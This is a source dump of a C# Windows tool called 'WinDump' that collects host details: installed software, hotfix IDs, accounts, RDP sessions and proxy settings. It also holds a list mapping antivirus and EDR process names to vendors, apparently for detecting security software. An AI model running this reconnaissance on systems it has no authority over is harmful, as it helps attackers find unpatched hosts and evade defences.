System.Collections.Generic; 4 | using System.Data; 5 | using System.Management; 6 | using System.Runtime.InteropServices; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | class SystemInfo 12 | { 13 | internal static DataTable GetDrive() 14 | { 15 | var dt = Utils.Query("SELECT DeviceID,VolumeName,FileSystem,Size,FreeSpace FROM Win32_LogicalDisk"); 16 | foreach (DataRow row in dt.Rows) 17 | { 18 | if (!double.TryParse(row["Size"].ToString(), out var size)) 19 | { 20 | size = 0; 21 | } 22 | if (!double.TryParse(row["FreeSpace"].ToString(), out var free)) 23 | { 24 | free = 0; 25 | } 26 | row["Size"] = string.Format("{0:0.00}G", (size / (1024.0 * 1024.0 * 1024.0))); 27 | row["FreeSpace"] = string.Format("{0:0.00}G", (free / (1024.0 * 1024.0 * 1024.0))); 28 | } 29 | return dt; 30 | } 31 | private static DataTable _cacheApps = null; 32 | internal static DataTable GetInstalledApp() 33 | { 34 | if (_cacheApps != null) 35 | { 36 | return _cacheApps; 37 | } 38 | // 检查的注册表路径列表(包括32位和64位系统) 39 | string[] registryPaths = new string[] 40 | { 41 | @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", 42 | @"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" 43 | }; 44 | var dt = new DataTable(); 45 | dt.Columns.Add("Name"); 46 | dt.Columns.Add("Location"); 47 | dt.Columns.Add("Date"); 48 | foreach (var path in registryPaths) 49 | { 50 | using (RegistryKey key = Registry.LocalMachine.OpenSubKey(path)) 51 | { 52 | if (key == null) continue; 53 | 54 | foreach (string subkeyName in key.GetSubKeyNames()) 55 | { 56 | using (RegistryKey subkey = key.OpenSubKey(subkeyName)) 57 | { 58 | string displayName = subkey?.GetValue("DisplayName") as string; 59 | string installLocation = subkey?.GetValue("InstallLocation") as string; 60 | string date = subkey?.GetValue("InstallDate") as string; 61 | if (displayName != null) 62 | { 63 | dt.Rows.Add(displayName,installLocation,date); 64 | } 65 | } 66 | } 67 | } 68 | } 69 | _cacheApps = dt; 70 | return _cacheApps; 71 | } 
72 | internal static DataTable GetInfo() 73 | { 74 | 75 | 76 | var dt = new DataTable(); 77 | dt.Columns.Add("Name"); 78 | dt.Columns.Add("Value"); 79 | dt.Rows.Add("OSVersion", GetWindowsOSName()); 80 | dt.Rows.Add("SystemDirectory", Environment.SystemDirectory); 81 | dt.Rows.Add("MachineName", Environment.MachineName); 82 | dt.Rows.Add("UserName", Environment.UserName); 83 | dt.Rows.Add("UserDomainName", Environment.UserDomainName); 84 | 85 | 86 | var mem = Memory(); 87 | if ( mem != null) 88 | { 89 | dt.Rows.Add("Memory", mem); 90 | } 91 | 92 | using (RegistryKey processorKey = Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0")) 93 | { 94 | if (processorKey != null) 95 | { 96 | dt.Rows.Add("CPU", $"{processorKey.GetValue("ProcessorNameString").ToString().Trim()} ({Environment.ProcessorCount} cores)"); 97 | } 98 | } 99 | dt.Rows.Add("Proxy", GetSystemProxy()); 100 | 101 | dt.Rows.Add("KB", GetKBFix()); 102 | return dt; 103 | 104 | 105 | } 106 | static string GetKBFix() 107 | { 108 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT HotFixID FROM Win32_QuickFixEngineering"); 109 | var sb = new StringBuilder(); 110 | foreach (ManagementObject obj in searcher.Get()) 111 | { 112 | sb.AppendLine(obj["HotFixID"].ToString()); 113 | } 114 | return sb.ToString(); 115 | } 116 | static string GetWindowsOSName() 117 | { 118 | try 119 | { 120 | using (var searcher = new ManagementObjectSearcher("SELECT Caption FROM Win32_OperatingSystem")) 121 | { 122 | foreach (ManagementObject os in searcher.Get()) 123 | { 124 | return os["Caption"].ToString(); 125 | } 126 | } 127 | 128 | } 129 | catch 130 | { 131 | 132 | } 133 | return "Unknow"; 134 | 135 | } 136 | static string GetSystemProxy() 137 | { 138 | using(var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Internet Settings",false)) 139 | { 140 | return key.GetValue("ProxyServer", "").ToString(); 141 | } 142 | } 143 | static string Memory() 
{ 144 | MEMORYSTATUSEX memStatus = new MEMORYSTATUSEX(); 145 | if (!GlobalMemoryStatusEx(memStatus)) 146 | { 147 | return null; 148 | 149 | } 150 | double totalMemoryGB = memStatus.ullTotalPhys / (1024.0 * 1024.0 * 1024.0); 151 | double availMemoryGB = memStatus.ullAvailPhys / (1024.0 * 1024.0 * 1024.0); 152 | return string.Format("{0:0.00}G/{1:0.00}G",availMemoryGB,totalMemoryGB); 153 | } 154 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 155 | private static extern bool GlobalMemoryStatusEx([In, Out] MEMORYSTATUSEX lpBuffer); 156 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 157 | private class MEMORYSTATUSEX 158 | { 159 | public uint dwLength; 160 | public uint dwMemoryLoad; 161 | public ulong ullTotalPhys; 162 | public ulong ullAvailPhys; 163 | public ulong ullTotalPageFile; 164 | public ulong ullAvailPageFile; 165 | public ulong ullTotalVirtual; 166 | public ulong ullAvailVirtual; 167 | public ulong ullAvailExtendedVirtual; 168 | public MEMORYSTATUSEX() 169 | { 170 | dwLength = (uint)Marshal.SizeOf(typeof(MEMORYSTATUSEX)); 171 | } 172 | } 173 | } 174 | } 175 | -------------------------------------------------------------------------------- /User.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | class User 10 | { 11 | internal static DataTable GetUser() 12 | { 13 | return Utils.Query("SELECT Name,SID,Status,Domain,LocalAccount FROM Win32_Account Where SIDType=1"); 14 | } 15 | } 16 | class QUser 17 | { 18 | [DllImport("wtsapi32.dll")] 19 | static extern IntPtr WTSOpenServer([MarshalAs(UnmanagedType.LPStr)] string pServerName); 20 | 21 | [DllImport("wtsapi32.dll")] 22 | static extern void WTSCloseServer(IntPtr hServer); 23 | 24 | [DllImport("wtsapi32.dll")] 25 | static extern Int32 
WTSEnumerateSessions(IntPtr hServer, 26 | [MarshalAs(UnmanagedType.U4)] Int32 Reserved, 27 | [MarshalAs(UnmanagedType.U4)] Int32 Version, 28 | ref IntPtr ppSessionInfo, 29 | [MarshalAs(UnmanagedType.U4)] ref Int32 pCount); 30 | 31 | [DllImport("wtsapi32.dll")] 32 | static extern void WTSFreeMemory(IntPtr pMemory); 33 | 34 | [DllImport("wtsapi32.dll")] 35 | static extern bool WTSQuerySessionInformation(IntPtr hServer, 36 | int sessionId, 37 | WTS_INFO_CLASS wtsInfoClass, 38 | out IntPtr ppBuffer, 39 | out uint pBytesReturned); 40 | 41 | [StructLayout(LayoutKind.Sequential)] 42 | private struct WTS_SESSION_INFO 43 | { 44 | public Int32 SessionID; 45 | [MarshalAs(UnmanagedType.LPStr)] 46 | public string pWinStationName; 47 | public WTS_CONNECTSTATE_CLASS State; 48 | } 49 | //https://social.technet.microsoft.com/Forums/windowsserver/en-US/cbfd802c-5add-49f3-b020-c901f1a8d3f4/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 50 | //https://docs.microsoft.com/en-us/windows/win32/api/wtsapi32/ns-wtsapi32-wtsinfoa 51 | [StructLayout(LayoutKind.Sequential)] 52 | public struct WTSINFOA 53 | { 54 | public const int WINSTATIONNAME_LENGTH = 32; 55 | public const int DOMAIN_LENGTH = 17; 56 | public const int USERNAME_LENGTH = 20; 57 | WTS_CONNECTSTATE_CLASS State; 58 | public int SessionId; 59 | public int IncomingBytes; 60 | public int OutgoingBytes; 61 | public int IncomingFrames; 62 | public int OutgoingFrames; 63 | public int IncomingCompressedBytes; 64 | public int OutgoingCompressedBytes; 65 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = WINSTATIONNAME_LENGTH)] 66 | byte[] WinStationNameRaw; 67 | public string WinStationName 68 | { 69 | get 70 | { 71 | return Encoding.ASCII.GetString(WinStationNameRaw); 72 | } 73 | } 74 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = DOMAIN_LENGTH)] 75 | public byte[] DomainRaw; 76 | public string Domain 77 | { 78 | get 79 | { 80 | return Encoding.ASCII.GetString(DomainRaw); 81 | } 82 | } 83 | 
[MarshalAs(UnmanagedType.ByValArray, SizeConst = USERNAME_LENGTH + 1)] 84 | public byte[] UserNameRaw; 85 | public string UserName 86 | { 87 | get 88 | { 89 | return Encoding.ASCII.GetString(UserNameRaw); 90 | } 91 | } 92 | public long ConnectTimeUTC; 93 | public DateTime ConnectTime 94 | { 95 | get 96 | { 97 | return DateTime.FromFileTimeUtc(ConnectTimeUTC); 98 | } 99 | } 100 | public long DisconnectTimeUTC; 101 | public DateTime DisconnectTime 102 | { 103 | get 104 | { 105 | return DateTime.FromFileTimeUtc(DisconnectTimeUTC); 106 | } 107 | } 108 | public long LastInputTimeUTC; 109 | public DateTime LastInputTime 110 | { 111 | get 112 | { 113 | return DateTime.FromFileTimeUtc(LastInputTimeUTC); 114 | } 115 | } 116 | public long LogonTimeUTC; 117 | public DateTime LogonTime 118 | { 119 | get 120 | { 121 | return DateTime.FromFileTimeUtc(LogonTimeUTC); 122 | } 123 | } 124 | public long CurrentTimeUTC; 125 | public DateTime CurrentTime 126 | { 127 | get 128 | { 129 | return DateTime.FromFileTimeUtc(CurrentTimeUTC); 130 | } 131 | } 132 | } 133 | public enum WTS_INFO_CLASS 134 | { 135 | WTSInitialProgram, 136 | WTSApplicationName, 137 | WTSWorkingDirectory, 138 | WTSOEMId, 139 | WTSSessionId, 140 | WTSUserName, 141 | WTSWinStationName, 142 | WTSDomainName, 143 | WTSConnectState, 144 | WTSClientBuildNumber, 145 | WTSClientName, 146 | WTSClientDirectory, 147 | WTSClientProductId, 148 | WTSClientHardwareId, 149 | WTSClientAddress, 150 | WTSClientDisplay, 151 | WTSClientProtocolType, 152 | WTSIdleTime, 153 | WTSLogonTime, 154 | WTSIncomingBytes, 155 | WTSOutgoingBytes, 156 | WTSIncomingFrames, 157 | WTSOutgoingFrames, 158 | WTSClientInfo, 159 | WTSSessionInfo 160 | } 161 | 162 | public enum WTS_CONNECTSTATE_CLASS 163 | { 164 | Active, 165 | Connected, 166 | ConnectQuery, 167 | Shadow, 168 | Disconnected, 169 | Idle, 170 | Listen, 171 | Reset, 172 | Down, 173 | Init 174 | } 175 | 
//https://stackoverflow.com/questions/32522545/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 176 | //https://social.technet.microsoft.com/Forums/windowsserver/en-US/cbfd802c-5add-49f3-b020-c901f1a8d3f4/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 177 | internal static DataTable GetQUser() 178 | { 179 | IntPtr serverHandle = WTSOpenServer(""); 180 | var dt = new DataTable(); 181 | dt.Columns.Add("UserName"); 182 | dt.Columns.Add("Domain"); 183 | dt.Columns.Add("WinStationName"); 184 | dt.Columns.Add("SessionID"); 185 | dt.Columns.Add("State"); 186 | dt.Columns.Add("Idle"); 187 | dt.Columns.Add("LoginTime"); 188 | try 189 | { 190 | IntPtr sessionInfoPtr = IntPtr.Zero; 191 | IntPtr userPtr = IntPtr.Zero; 192 | IntPtr domainPtr = IntPtr.Zero; 193 | IntPtr wtsinfoPtr = IntPtr.Zero; 194 | Int32 sessionCount = 0; 195 | //https://docs.microsoft.com/en-us/windows/win32/api/wtsapi32/nf-wtsapi32-wtsenumeratesessionsa 196 | //Retrieves a list of sessions on a Remote Desktop Session Host (RD Session Host) server. 
197 | Int32 retVal = WTSEnumerateSessions(serverHandle, 0, 1, ref sessionInfoPtr, ref sessionCount); 198 | Int32 dataSize = Marshal.SizeOf(typeof(WTS_SESSION_INFO)); 199 | IntPtr currentSession = sessionInfoPtr; 200 | uint bytes = 0; 201 | 202 | 203 | if (retVal != 0) 204 | { 205 | //collect sessions - may contain duplicates 206 | for (int i = 0; i < sessionCount; i++) 207 | { 208 | WTS_SESSION_INFO si = (WTS_SESSION_INFO)Marshal.PtrToStructure(currentSession, typeof(WTS_SESSION_INFO)); 209 | currentSession = new IntPtr(currentSession.ToInt64() + dataSize); 210 | 211 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSUserName, out userPtr, out bytes); 212 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSDomainName, out domainPtr, out bytes); 213 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSSessionInfo, out wtsinfoPtr, out bytes); 214 | 215 | string domain = Marshal.PtrToStringAnsi(domainPtr); 216 | string username = Marshal.PtrToStringAnsi(userPtr); 217 | 218 | var wtsinfo = (WTSINFOA)Marshal.PtrToStructure(wtsinfoPtr, typeof(WTSINFOA)); 219 | 220 | //if username is not null 221 | if (!String.IsNullOrEmpty(Marshal.PtrToStringAnsi(userPtr))) 222 | { 223 | var idle = wtsinfo.LastInputTimeUTC == 0 ? 
"none" : wtsinfo.LastInputTime.ToString(); 224 | dt.Rows.Add( 225 | username, 226 | domain, 227 | si.pWinStationName, 228 | si.SessionID, 229 | si.State.ToString(), 230 | idle, 231 | wtsinfo.LogonTime 232 | ); 233 | } 234 | WTSFreeMemory(userPtr); 235 | WTSFreeMemory(domainPtr); 236 | WTSFreeMemory(wtsinfoPtr); 237 | } 238 | 239 | WTSFreeMemory(sessionInfoPtr); 240 | 241 | } 242 | 243 | } 244 | finally 245 | { 246 | WTSCloseServer(serverHandle); 247 | 248 | } 249 | 250 | return dt; 251 | } 252 | } 253 | 254 | } 255 | -------------------------------------------------------------------------------- /Utils.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Management; 7 | using System.Text; 8 | using System.Text.RegularExpressions; 9 | 10 | namespace WinDump 11 | { 12 | internal class Utils 13 | { 14 | public const string CIMV2 = "root\\CIMV2"; 15 | public const string StandardCimv2 = "root/StandardCimv2"; 16 | internal delegate DataTable DtCall(); 17 | internal static string TryToHTML(DtCall call) 18 | { 19 | try 20 | { 21 | return ToHTML(call()); 22 | } 23 | catch 24 | { 25 | return ""; 26 | } 27 | } 28 | internal static string ToHTML(DataTable dt) 29 | { 30 | if (dt == null) 31 | { 32 | return ""; 33 | } 34 | StringBuilder html = new StringBuilder(1024*128); 35 | 36 | // 开始表格 37 | html.Append("\n"); 38 | 39 | // 添加表头 40 | html.Append("\n \n"); 41 | foreach (DataColumn column in dt.Columns) 42 | { 43 | html.AppendFormat(" \n", column.ColumnName); 44 | } 45 | html.Append(" \n"); 46 | 47 | // 添加表体 48 | html.Append(""); 49 | foreach (DataRow row in dt.Rows) 50 | { 51 | html.Append(" \n"); 52 | foreach (DataColumn column in dt.Columns) 53 | { 54 | html.AppendFormat(" \n", row[column].ToString()); 55 | } 56 | html.Append(" \n"); 57 | } 58 | html.Append("\n"); 59 | 60 | // 结束表格 61 | html.Append("
{0}
{0}
"); 62 | return html.ToString(); 63 | } 64 | internal static byte[] FromHex(string hex) 65 | { 66 | if (hex == null) 67 | { 68 | return null; 69 | } 70 | byte[] bytes = new byte[hex.Length / 2]; 71 | for (int i = 0; i < hex.Length; i += 2) 72 | { 73 | string hexByte = hex.Substring(i, 2); 74 | bytes[i / 2] = Convert.ToByte(hexByte, 16); 75 | } 76 | return bytes; 77 | } 78 | 79 | internal static string ToHex(byte[] bytes) 80 | { 81 | StringBuilder hex = new StringBuilder(bytes.Length * 2); 82 | foreach (byte b in bytes) 83 | { 84 | hex.AppendFormat("{0:X2}", b); 85 | } 86 | return hex.ToString(); 87 | } 88 | internal static DataTable Query(string sql, string scope=CIMV2) 89 | { 90 | var dataTable = new DataTable(); 91 | var match = Regex.Match(sql, @"SELECT\s+(.*?)\s+FROM", RegexOptions.IgnoreCase); 92 | if (match.Success) 93 | { 94 | var fields = match.Groups[1].Value.Split(','); 95 | foreach (var field in fields) 96 | { 97 | dataTable.Columns.Add(field.Trim()); 98 | } 99 | } 100 | foreach (ManagementObject item in new ManagementObjectSearcher(scope, sql).Get()) 101 | { 102 | 103 | var row = dataTable.NewRow(); 104 | foreach (var f in item.Properties) 105 | { 106 | 107 | if (f.Value == null) 108 | { 109 | row[f.Name] = ""; 110 | } 111 | else if (f.IsArray ) 112 | { 113 | var values = (Array)f.Value; 114 | var sb = new StringBuilder(); 115 | foreach (var v in values) { 116 | sb.Append(v.ToString()); 117 | sb.Append(" "); 118 | } 119 | row[f.Name] = sb.ToString(); 120 | } 121 | else 122 | { 123 | row[f.Name] = f.Value; 124 | } 125 | } 126 | dataTable.Rows.Add(row); 127 | } 128 | return dataTable; 129 | } 130 | public static string GetInstalledAppPath(string appName) 131 | { 132 | // 检查的注册表路径列表(包括32位和64位系统) 133 | string[] registryPaths = new string[] 134 | { 135 | @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", 136 | @"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" 137 | }; 138 | 139 | foreach (var path in registryPaths) 140 | { 141 | using 
(RegistryKey key = Registry.LocalMachine.OpenSubKey(path)) 142 | { 143 | if (key == null) continue; 144 | 145 | foreach (string subkeyName in key.GetSubKeyNames()) 146 | { 147 | using (RegistryKey subkey = key.OpenSubKey(subkeyName)) 148 | { 149 | string displayName = subkey?.GetValue("DisplayName") as string; 150 | if (displayName?.Contains(appName) == true) 151 | { 152 | return subkey.GetValue("InstallLocation") as string 153 | ?? subkey.GetValue("UninstallString") as string; 154 | } 155 | } 156 | } 157 | } 158 | } 159 | return null; // 未找到返回null 160 | } 161 | internal static string[] GetAppLocation(string name) 162 | { 163 | var dt = SystemInfo.GetInstalledApp(); 164 | var locs = new List(); 165 | foreach (DataRow row in dt.Rows) 166 | { 167 | if (row["Name"].ToString().Contains(name)) 168 | { 169 | var loc = row["Location"] as string; 170 | if (!string.IsNullOrEmpty(loc)) 171 | { 172 | locs.Add(loc); 173 | } 174 | 175 | 176 | } 177 | } 178 | return locs.ToArray(); 179 | } 180 | 181 | } 182 | 183 | internal class IniParser 184 | { 185 | private Dictionary> sections = 186 | new Dictionary>(StringComparer.OrdinalIgnoreCase); 187 | 188 | public IniParser(string filePath) 189 | { 190 | Parse(filePath); 191 | } 192 | 193 | private void Parse(string filePath) 194 | { 195 | string currentSection = null; 196 | 197 | foreach (string line in File.ReadAllLines(filePath)) 198 | { 199 | string trimmedLine = line.Trim(); 200 | 201 | // 跳过空行 202 | if (string.IsNullOrEmpty(trimmedLine)) 203 | continue; 204 | 205 | // 处理节 206 | if (trimmedLine.StartsWith("[") && trimmedLine.EndsWith("]")) 207 | { 208 | currentSection = trimmedLine.Substring(1, trimmedLine.Length - 2); 209 | if (!sections.ContainsKey(currentSection)) 210 | { 211 | sections[currentSection] = new Dictionary(StringComparer.OrdinalIgnoreCase); 212 | } 213 | continue; 214 | } 215 | 216 | // 处理键值对 217 | int equalsPos = trimmedLine.IndexOf('='); 218 | if (equalsPos > 0 && currentSection != null) 219 | { 220 | string key 
= trimmedLine.Substring(0, equalsPos).Trim(); 221 | string value = trimmedLine.Substring(equalsPos + 1).Trim(); 222 | sections[currentSection][key] = value; 223 | } 224 | } 225 | } 226 | 227 | public string GetValue(string section, string key) 228 | { 229 | if (sections.ContainsKey(section) && sections[section].ContainsKey(key)) 230 | { 231 | return sections[section][key]; 232 | } 233 | return null; 234 | } 235 | } 236 | 237 | } 238 | -------------------------------------------------------------------------------- /WinDump.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4DC5651B-AC64-449B-BC58-620086193035} 8 | WinExe 9 | WinDump 10 | WinDump 11 | v2.0 12 | 512 13 | true 14 | 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | True 74 | True 75 | Resource.resx 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | ResXFileCodeGenerator 84 | Resource.Designer.cs 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /WinDump.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.13.35931.197 d17.13 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WinDump", "WinDump.csproj", "{4DC5651B-AC64-449B-BC58-620086193035}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | 
EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4DC5651B-AC64-449B-BC58-620086193035}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4DC5651B-AC64-449B-BC58-620086193035}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4DC5651B-AC64-449B-BC58-620086193035}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4DC5651B-AC64-449B-BC58-620086193035}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {1B30CAD7-BAFF-45B1-B0D7-8321CD120677} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /av/README.md: -------------------------------------------------------------------------------- 1 | # av检测生成 2 | 3 | 数据来自: 4 | 5 | 执行`python todotnet.py`会生成out.txt -------------------------------------------------------------------------------- /av/out.txt: -------------------------------------------------------------------------------- 1 | static Dictionary av = new Dictionary { 2 | {"aylaunch.exe", "ALYac"}, 3 | {"ayupdate2.exe", "ALYac"}, 4 | {"AYRTSrv.exe", "ALYac"}, 5 | {"AYAgent.exe", "ALYac"}, 6 | {"AVGSvc.exe", "AVG"}, 7 | {"AVGUI.exe", "AVG"}, 8 | {"avgwdsvc.exe", "AVG"}, 9 | {"avg.exe", "AVG"}, 10 | {"avgaurd.exe", "AVG"}, 11 | {"avgemc.exe", "AVG"}, 12 | {"avgrsx.exe", "AVG"}, 13 | {"avgserv.exe", "AVG"}, 14 | {"avgw.exe", "AVG"}, 15 | {"arsm.exe", "Acronis"}, 16 | {"acronis_license_service.exe", "Acronis"}, 17 | {"AdAwareService.exe", "Ad-Aware"}, 18 | {"Ad-Aware.exe", "Ad-Aware"}, 19 | {"AdAware.exe", "Ad-Aware"}, 20 | {"patray.exe", "AhnLab-V3"}, 21 | {"V3Svc.exe", "AhnLab-V3"}, 22 | {"arcavir.exe", "Arcabit"}, 23 | {"arcadc.exe", "Arcabit"}, 24 | {"ArcaVirMaster.exe", "Arcabit"}, 25 | {"ArcaMainSV.exe", "Arcabit"}, 26 | {"ArcaTasksService.exe", "Arcabit"}, 27 | {"ashDisp.exe", 
"Avast"}, 28 | {"AvastUI.exe", "Avast"}, 29 | {"AvastSvc.exe", "Avast"}, 30 | {"AvastBrowser.exe", "Avast"}, 31 | {"AfwServ.exe", "Avast"}, 32 | {"avcenter.exe", "Avira AntiVirus(小红伞)"}, 33 | {"avguard.exe", "Avira AntiVirus(小红伞)"}, 34 | {"avgnt.exe", "Avira AntiVirus(小红伞)"}, 35 | {"sched.exe", "Avira AntiVirus(小红伞)"}, 36 | {"BaiduSdSvc.exe", "Baidu AntiVirus"}, 37 | {"BaiduSdTray.exe", "Baidu AntiVirus"}, 38 | {"BaiduSd.exe", "Baidu AntiVirus"}, 39 | {"bddownloader.exe", "百度卫士 or Baidu AntiVirus"}, 40 | {"baiduansvx.exe", "百度卫士-主进程 or Baidu AntiVirus"}, 41 | {"Bdagent.exe", "BitDefender"}, 42 | {"BitDefenderCom.exe", "BitDefender"}, 43 | {"vsserv.exe", "BitDefender"}, 44 | {"bdredline.exe", "BitDefender"}, 45 | {"secenter.exe", "BitDefender"}, 46 | {"bdservicehost.exe", "BitDefender"}, 47 | {"BITDEFENDER.exe", "BitDefender"}, 48 | {"BKavService.exe", "Bkav"}, 49 | {"Bka.exe", "Bkav"}, 50 | {"BkavUtil.exe", "Bkav"}, 51 | {"BLuPro.exe", "Bkav"}, 52 | {"QUHLPSVC.exe", "CAT-QuickHeal"}, 53 | {"onlinent.exe", "CAT-QuickHeal"}, 54 | {"sapissvc.exe", "CAT-QuickHeal"}, 55 | {"scanwscs.exe", "CAT-QuickHeal"}, 56 | {"CMCTrayIcon.exe", "CMC"}, 57 | {"freshclam.exe", "ClamAV"}, 58 | {"cpf.exe", "Comodo"}, 59 | {"cavwp.exe", "Comodo"}, 60 | {"ccavsrv.exe", "Comodo"}, 61 | {"cmdvirth.exe", "Comodo"}, 62 | {"csfalconservice.exe", "CrowdStrike Falcon(猎鹰)"}, 63 | {"CSFalconContainer.exe", "CrowdStrike Falcon(猎鹰)"}, 64 | {"CybereasonRansomFree.exe", "Cybereason"}, 65 | {"CybereasonRansomFreeServiceHost.exe", "Cybereason"}, 66 | {"CybereasonAV.exe", "Cybereason"}, 67 | {"CylanceSvc.exe", "Cylance"}, 68 | {"vsedsps.exe", "Cyren"}, 69 | {"vseamps.exe", "Cyren"}, 70 | {"vseqrts.exe", "Cyren"}, 71 | {"drwebcom.exe", "DrWeb"}, 72 | {"spidernt.exe", "DrWeb"}, 73 | {"drwebscd.exe", "DrWeb"}, 74 | {"drweb32w.exe", "DrWeb"}, 75 | {"dwengine.exes", "DrWeb"}, 76 | {"egui.exe", "ESET-NOD32"}, 77 | {"ecls.exe", "ESET-NOD32"}, 78 | {"ekrn.exe", "ESET-NOD32"}, 79 | {"eguiProxy.exe", "ESET-NOD32"}, 
80 | {"EShaSrv.exe", "ESET-NOD32"}, 81 | {"tmpfw.exe", "Trend Micro(趋势科技)"}, 82 | {"tmlisten.exe", "Trend Micro(趋势科技)"}, 83 | {"coreServiceShell.exe", "Trend Micro(趋势科技)"}, 84 | {"coreFrameworkHost.exe", "Trend Micro(趋势科技)"}, 85 | {"uiWatchDog.exe", "Trend Micro(趋势科技)"}, 86 | {"TMLISTEN.exe", "Trend Micro(趋势科技)"}, 87 | {"a2guard.exe", "Emsisoft"}, 88 | {"a2free.exe", "Emsisoft"}, 89 | {"a2service.exe", "Emsisoft"}, 90 | {"endgame.exe", "Endgame"}, 91 | {"F-PROT.exe", "F-Prot"}, 92 | {"FProtTray.exe", "F-Prot"}, 93 | {"FPAVServer.exe", "F-Prot"}, 94 | {"f-stopw.exe", "F-Prot"}, 95 | {"f-prot95.exe", "F-Prot"}, 96 | {"f-agnt95.exe", "F-Prot"}, 97 | {"f-secure.exe", "F-Secure"}, 98 | {"fssm32.exe", "F-Secure"}, 99 | {"Fsorsp64.exe", "F-Secure"}, 100 | {"fsavgui.exe", "F-Secure"}, 101 | {"fameh32.exe", "F-Secure"}, 102 | {"fch32.exe", "F-Secure"}, 103 | {"fih32.exe", "F-Secure"}, 104 | {"fnrb32.exe", "F-Secure"}, 105 | {"fsav32.exe", "F-Secure"}, 106 | {"fsma32.exe", "F-Secure"}, 107 | {"fsmb32.exe", "F-Secure"}, 108 | {"xagtnotif.exe", "FireEye(火眼)"}, 109 | {"xagt.exe", "FireEye(火眼)"}, 110 | {"FortiClient.exe", "Fortinet(飞塔)"}, 111 | {"FortiTray.exe", "Fortinet(飞塔)"}, 112 | {"FortiScand.exe", "Fortinet(飞塔)"}, 113 | {"FortiWF.exe", "Fortinet(飞塔)"}, 114 | {"FortiProxy.exe", "Fortinet(飞塔)"}, 115 | {"FortiESNAC.exe", "Fortinet(飞塔)"}, 116 | {"FortiSSLVPNdaemon.exe", "Fortinet(飞塔)"}, 117 | {"FortiTcs.exe", "Fortinet(飞塔)"}, 118 | {"FctSecSvr.exe", "Fortinet(飞塔)"}, 119 | {"AVK.exe", "G Data安全软件客户端 or GData"}, 120 | {"avkcl.exe", "GData"}, 121 | {"avkpop.exe", "GData"}, 122 | {"avkservice.exe", "GData"}, 123 | {"GDScan.exe", "G Data扫描器 or GData"}, 124 | {"AVKWCtl.exe", "GData"}, 125 | {"AVKProxy.exe", "G Data杀毒代理 or GData"}, 126 | {"AVKBackupService.exe", "G Data备份服务 or GData"}, 127 | {"guardxservice.exe", "Ikarus"}, 128 | {"guardxkickoff.exe", "Ikarus"}, 129 | {"KVFW.exe", "Jiangmin"}, 130 | {"KVsrvXP.exe", "Jiangmin"}, 131 | {"KVMonXP.exe", "Jiangmin"}, 132 | {"KVwsc.exe", 
